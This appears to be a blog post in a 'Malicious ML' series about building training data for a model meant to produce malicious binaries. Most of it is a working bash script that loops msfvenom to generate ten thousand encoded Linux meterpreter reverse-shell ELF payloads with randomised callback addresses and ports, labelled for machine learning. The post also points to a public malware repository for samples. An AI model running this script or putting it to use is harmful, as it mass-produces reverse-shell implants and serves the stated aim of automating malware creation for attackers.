Malicious ML series - generate ELF training data

I hold a PhD in Computer Science and have been published in a variety of international peer-reviewed journals.
AI is going to be a problem. I don't know what will cause the first "big issue"; it might be from a courtroom where a defendant is sent to jail based off erroneous AI-generated data, it could be a death in a medical setting.. but, something is going to happen.
Let's take the existing adversarial AI research (there's been plenty) and make it useful.
I'm here to bring you up to speed.
Purpose
If we want to train an ML algorithm to produce something malicious - say, a C2 beacon or a ransomware binary, we need good training data.
Approach
Use MSFVenom to generate a few thousand samples we can then feed into an ML algorithm.
Drawbacks
Due to bypassing compilers and linking steps, this at best will generate working binaries for a single architecture. Even if it generates a valid binary, it's not going to produce magical AV/EDR evading binaries compatible with multiple platforms and customizable C2 domains. However, it's still a fun experiment.
Alternatives to generation
There are lots of malicious binary examples out there.
VX-Underground
Download binaries directly from [[VX-Underground]] or a standard academic dataset. This introduces a lot of variety in PE/ELF format.
Code
Prereq - msfvenom installed
#!/bin/bash
overall_start_time=$(date +%s)
numFiles=10000
echo "Generating files.."
for i in $(seq 1 $numFiles); do
LHOSTO=$((1 + $RANDOM % 100))
LPORTCHOICES=(80 443 1025 8080 8888 4444 1234 12345 5555 3333 4433 8443 9999 10000)
LPORTIDX=$(( $RANDOM % ${#LPORTCHOICES[@]} ))
LPORTR=${LPORTCHOICES[$LPORTIDX]}
FILENAME=$(uuidgen).elf
PAYLOADTYPES=("linux/x86/meterpreter/reverse_tcp" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter/reverse_tcp_uuid" "linux/x86/meterpreter_reverse_https" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter_reverse_http" "linux/x86/meterpreter_reverse_https")
PAYLOADIDX=$(( $RANDOM % ${#PAYLOADTYPES[@]} ))
PAYLOAD=${PAYLOADTYPES[$PAYLOADIDX]}
ENCODERS=("x86/shikata_ga_nai" "x86/xor_dynamic" "generic/none")
ENCODERIDX=$((RANDOM % ${#ENCODERS[@]}))
ENCODERR=${ENCODERS[$ENCODERIDX]}
# Generate based on payload type
start_time=$(date +%s)
msfvenom -p $PAYLOAD LHOST=192.168.0.$LHOSTO LPORT=$LPORTR -e $ENCODERR -f elf -o out/$FILENAME 2> /dev/null
end_time=$(date +%s)
duration=$((end_time - start_time))
# echo "Generated $FILENAME : $PAYLOAD : 192.168.0.$LHOSTO : $LPORTR in $duration seconds"
echo -e "$FILENAME\t$PAYLOAD\t192.168.0.$LHOSTO\t$LPORTR\t$ENCODERR" >> labels.tsv
percent=$((i * 100 / numFiles))
printf "\rProgress: [%-50s] %d%%" $(printf "%-${percent}s" | tr ' ' '#') $percent
echo -ne
done
overall_end_time=$(date +%s)
duration=$((overall_end_time - overall_start_time))
echo "Done in $duration seconds."
Explanation
Generate a bunch of meterpreter shells for use in ML algos.
Since the diffs in these files will simply be the encoded (or encrypted) payload, which will be high-entropy, it's doubtful any ML algorithm can learn enough to generate working binaries, much less working malware.
Entropy Analysis

We ran a simple cosine similarity comparison across the generated binaries. As the animation shows, these binaries show a fairly random distribution of differences; however, note the scale of differences is not extreme.
Still, it's a fun experiment.